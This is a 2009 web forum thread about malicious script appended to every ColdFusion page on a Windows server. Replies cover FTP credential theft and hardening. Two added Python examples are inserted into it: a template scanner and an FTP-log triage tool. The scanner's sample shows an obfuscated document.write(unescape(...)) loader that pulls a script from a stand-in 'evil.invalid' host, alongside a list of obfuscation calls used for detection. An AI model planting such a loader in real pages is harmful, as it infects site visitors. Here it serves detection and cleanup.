Participant
June 10, 2009
Answered

Script injection on .cfm pages

  • June 10, 2009
  • 5 replies
  • 858 views

I need help. For the second time in three months every single .cfm page has a malicious cross-site script appended to the original code. It looks something like this:

I'm having a really hard time trying to figure out where this might be coming from, or where the vulnerability is. Has anyone been affected by the same scripting attack? I'm running a Windows 2003 server, Fusebox 4.0 framework on an MS SQL database. Thanks for any help or any leads that might help solve this problem!
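Before the replies, a practical way to find what the poster describes: script blocks tacked onto the end of every .cfm template. The following is an added example, not code from the original post or from any of the thread's participants. It does two things a practitioner would want when triaging this: flag `<script>` blocks that sit after the template's closing `</html>`, load from a host outside an allowlist, or use common obfuscation calls; and diff each live template against the copy in a known-good backup so the exact injected bytes can be read. The two sample templates, the `evil.invalid` host and the `TRUSTED_SCRIPT_HOSTS` list are constructed for the example and are not from the thread.

```python
"""Find script blocks appended to ColdFusion templates.

Added example for the thread above; not the poster's code. Sample templates
and the trusted-host list below are constructed for illustration.
"""
import difflib
import re
from pathlib import Path
from typing import Dict, List, Tuple

# Hosts the site legitimately loads scripts from (assumption for the example).
TRUSTED_SCRIPT_HOSTS = {"www.example.com", "ajax.googleapis.com"}

SCRIPT_TAG = re.compile(r"<script\b[^>]*>.*?</script\s*>", re.IGNORECASE | re.DOTALL)
SRC_HOST = re.compile(r"""\bsrc\s*=\s*["']?(?:https?:)?//([^/"'\s>]+)""", re.IGNORECASE)
CLOSE_HTML = re.compile(r"</html\s*>", re.IGNORECASE)
# Calls that legitimate site scripts rarely need but injected loaders lean on.
OBFUSCATION_CALLS = ("unescape(", "document.write(", "fromcharcode(", "eval(")


def find_suspicious_scripts(source: str) -> List[Tuple[str, str]]:
    """Return (reasons, snippet) for every <script> block in one template that
    is placed after the last </html>, loads from an untrusted host, or uses
    one of the obfuscation calls above."""
    closes = list(CLOSE_HTML.finditer(source))
    end_of_page = closes[-1].end() if closes else None
    findings = []
    for m in SCRIPT_TAG.finditer(source):
        block = m.group(0)
        reasons = []
        if end_of_page is not None and m.start() >= end_of_page:
            reasons.append("appended after </html>")
        host = SRC_HOST.search(block)
        if host and host.group(1).lower() not in TRUSTED_SCRIPT_HOSTS:
            reasons.append("loads from untrusted host " + host.group(1))
        lowered = block.lower()
        if any(call in lowered for call in OBFUSCATION_CALLS):
            reasons.append("uses obfuscation call")
        if reasons:
            findings.append(("; ".join(reasons), block[:80]))
    return findings


def scan_webroot(root: Path, pattern: str = "*.cfm") -> Dict[str, List[Tuple[str, str]]]:
    """Run find_suspicious_scripts over every template under root.
    Keys are paths relative to root; only files with findings are listed."""
    report: Dict[str, List[Tuple[str, str]]] = {}
    for path in root.rglob(pattern):
        hits = find_suspicious_scripts(path.read_text(errors="replace"))
        if hits:
            report[str(path.relative_to(root))] = hits
    return report


def diff_against_backup(live: str, backup: str) -> List[str]:
    """Lines present in the live template but absent from the known-good
    backup. For an append-only injection this is exactly the injected block."""
    return [line[2:] for line in difflib.ndiff(backup.splitlines(), live.splitlines())
            if line.startswith("+ ")]


# Constructed sample templates (not real site files).
CLEAN_TEMPLATE = """<cfset title = "Home">
<html><head><title>#title#</title>
<script src="http://www.example.com/site.js"></script></head>
<body><cfoutput>Hello</cfoutput></body></html>
"""

INJECTED_TEMPLATE = CLEAN_TEMPLATE + (
    "<script>document.write(unescape('%3Cscript src=%22http://evil.invalid/x.js%22%3E"
    "%3C/script%3E'))</script>\n"
)

if __name__ == "__main__":
    for reasons, snippet in find_suspicious_scripts(INJECTED_TEMPLATE):
        print(reasons, "->", snippet)
    print(diff_against_backup(INJECTED_TEMPLATE, CLEAN_TEMPLATE))
```

Run `scan_webroot(Path(r"C:\inetpub\wwwroot"))` against the site (the path is an assumption) and treat every hit as a file to restore from backup, not to hand-edit; the diff output is what to keep for the FTP-log correlation discussed in the replies.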

    This topic has been closed for replies.

    5 replies

    ilssac
    Inspiring
    June 10, 2009
    Another item to be aware of is the recent HUGE security hole on IIS servers with WebDAV enabled.  MS released a patch just yesterday to this problem that basically let any user access any file on any IIS server that had WebDAV turned on.

    REFERENCES:

    Microsoft:
    http://www.microsoft.com/windowsserver2003/iis/default.mspx
    http://www.microsoft.com/technet/security/advisory/971492.mspx
    http://www.microsoft.com/technet/prodtechnol/WindowsServer2003/Library/IIS/7b037954-441d-4037-a111-94df7880c319.mspx?mfr=true
    http://support.microsoft.com/default.aspx/kb/325864
    http://support.microsoft.com/kb/311350

    http://support.microsoft.com/?id=271071
    http://support.microsoft.com/kb/812614/

    Secunia:
    http://secunia.com/advisories/35109/
    Participant
    June 10, 2009

    Thanks for the great leads everybody.

    So it really sounds like the preferred method of entry here is compromised FTP accounts? The server I'm hosting my websites on is a VPS solution and only has a handful of FTP accounts. For the time being I've disabled those accounts, and enabled logging for the FTP server. Once things are cleaned up, I'll restrict the FTP accounts to the user IPs. Please, keep the information coming - this has been really helpful.

    Inspiring
    June 10, 2009

    This problem is necessarily caused by modification of the server-side script files.  Therefore, it is necessary that the server must have been compromised.  On a shared server, this is "more or less to be expected," since hundreds if not thousands of people other than yourself have accounts on the same server(s).  However, there is a lot that you can do to prevent it:  it only takes a couple of extra steps.

    1. Always use sftp (secure FTP) to transfer files and to establish host sessions.  Many hosting companies allow you to disable non-secure FTP, and you should do so.
    2. Protect your username/password as robustly as you can.  "password1234" is an extremely common password, as is "password." 
    3. After transferring files to your computer, use chown (Unix), cacls (Windows), or its equivalent to secure the files against anyone, including yourself.  (You can always countermand your directives later, the next time you're ready to update the site.)  This will at least require the intruder to have compromised your account, not someone else's.
    4. In that same vein, don't forget to secure all of the parent directories!  "It'll do no damn good at all" if the intruder can replace your carefully-secured directory, in its entirety, with an altered one!
    5. Make backups!
    6. If your site permits any sort of user-contributed content to be provided, make absolutely sure it is well-filtered.
    7. "Think like a pirate."  ("RRRRRrrrrrrrr!!")  Web-site compromises are always "crimes of opportunity."  Many a cat-burglar has made a good living by trying each door in a neighborhood while carrying a pizza box.
    Ken_Ford_-_ACP-QFo4AB (Correct answer)
    Inspiring
    June 10, 2009

    This is what you have:

    http://blog.unmaskparasites.com/2009/05/07/gumblar-cn-exploit-12-facts-about-this-injected-script/

    Ken Ford
    Adobe Community Expert - Dreamweaver/ColdFusion
    Adobe Certified Expert - Dreamweaver CS4
    Adobe Certified Expert - ColdFusion 8
    Fordwebs, LLC
    http://www.fordwebs.com
    http://www.cfnoob.com

    Participating Frequently
    June 10, 2009

    My experience is that the attack happens because some developer machines are compromised: a trojan on the developer machine can "steal" FTP usernames and passwords, connect to the FTP accounts and modify the files.

    Check your FTP logs for modifications to the files, change the FTP usernames and passwords for the site, scan the computers that are making FTP connections to the site.

    Mack
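Mack's first step, checking the FTP logs for who modified which files, is the one that settles whether stolen credentials were used. The following is an added example, not code from Mack or anyone else in the thread. It assumes the W3C extended log layout the IIS 6 FTP service writes (a `#Fields:` header naming the columns, a `[n]` connection prefix on `cs-method`, uploads logged as `created` and downloads as `sent`); the log lines and the `KNOWN_NETWORKS` allowlist are constructed for the example. It summarises file-changing activity per account and source address, calls out writes to .cfm files and sources outside the allowlist, and notes files that were downloaded and re-uploaded in the same session, which is what appending to an existing template looks like from the server side.

```python
"""Triage an IIS FTP log for file modifications by account and address.

Added example for the thread above; not code from any participant. Assumes
the IIS 6 W3C extended FTP log layout. Sample log and allowlist are constructed.
"""
from collections import defaultdict
from ipaddress import ip_address, ip_network
from typing import Dict, Iterable, List, Tuple

# Networks the site's legitimate developers connect from (assumption; the
# original poster planned to restrict FTP accounts to known user IPs).
KNOWN_NETWORKS = [ip_network("198.51.100.0/24")]

# FTP operations that change files on the server.
WRITE_VERBS = {"created", "DELE", "RNTO"}


def parse_w3c(lines: Iterable[str]) -> List[Dict[str, str]]:
    """Turn W3C extended log lines into dicts keyed by the #Fields: names.
    Directive lines are skipped; rows whose column count does not match the
    header are dropped rather than misaligned."""
    fields: List[str] = []
    records: List[Dict[str, str]] = []
    for raw in lines:
        line = raw.strip()
        if not line:
            continue
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if line.startswith("#"):
            continue
        parts = line.split()
        if fields and len(parts) == len(fields):
            records.append(dict(zip(fields, parts)))
    return records


def triage(lines: Iterable[str]) -> List[Dict[str, object]]:
    """Summarise file-changing activity per (account, source address)."""
    by_actor: Dict[Tuple[str, str], List[Dict[str, str]]] = defaultdict(list)
    for r in parse_w3c(lines):
        verb = r["cs-method"].split("]", 1)[-1]   # "[2]created" -> "created"
        if verb in WRITE_VERBS or verb == "sent":
            by_actor[(r["cs-username"], r["c-ip"])].append({**r, "verb": verb})
    report: List[Dict[str, object]] = []
    for (user, ip), evs in sorted(by_actor.items()):
        writes = [e for e in evs if e["verb"] in WRITE_VERBS]
        if not writes:
            continue
        downloaded = {e["cs-uri-stem"] for e in evs if e["verb"] == "sent"}
        created = [e["cs-uri-stem"] for e in writes if e["verb"] == "created"]
        report.append({
            "user": user,
            "ip": ip,
            "unexpected_source": not any(ip_address(ip) in n for n in KNOWN_NETWORKS),
            "writes": len(writes),
            "cfm_files": [p for p in created if p.lower().endswith(".cfm")],
            # A file fetched and then uploaded again in the same session was
            # most likely modified in place rather than replaced outright.
            "rewritten_in_place": [p for p in created if p in downloaded],
            "window": (writes[0]["date"] + " " + writes[0]["time"],
                       writes[-1]["date"] + " " + writes[-1]["time"]),
        })
    return report


# Constructed sample log in the IIS 6 FTP W3C layout (not a real server's log).
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 6.0
#Version: 1.0
#Date: 2009-06-09 00:00:00
#Fields: date time c-ip cs-username cs-method cs-uri-stem sc-status sc-win32-status
2009-06-09 14:02:11 198.51.100.7 webdev [1]USER webdev 331 0
2009-06-09 14:02:11 198.51.100.7 webdev [1]PASS - 230 0
2009-06-09 14:02:40 198.51.100.7 webdev [1]created /images/logo.gif 226 0
2009-06-09 14:03:02 198.51.100.7 webdev [1]closed - 226 0
2009-06-10 03:12:44 203.0.113.55 webdev [2]USER webdev 331 0
2009-06-10 03:12:44 203.0.113.55 webdev [2]PASS - 230 0
2009-06-10 03:12:45 203.0.113.55 webdev [2]sent /index.cfm 226 0
2009-06-10 03:12:46 203.0.113.55 webdev [2]created /index.cfm 226 0
2009-06-10 03:12:47 203.0.113.55 webdev [2]sent /fbx_switch.cfm 226 0
2009-06-10 03:12:48 203.0.113.55 webdev [2]created /fbx_switch.cfm 226 0
2009-06-10 03:12:49 203.0.113.55 webdev [2]closed - 226 0
"""

if __name__ == "__main__":
    for row in triage(SAMPLE_LOG.splitlines()):
        print(row)
```

Point it at the real log with `triage(open(path).read().splitlines())`. The same account appearing from an unexpected address, at an odd hour, touching only .cfm files it had just downloaded, is the pattern the thread is describing; the timestamps in `window` are what to match against file modification times on disk.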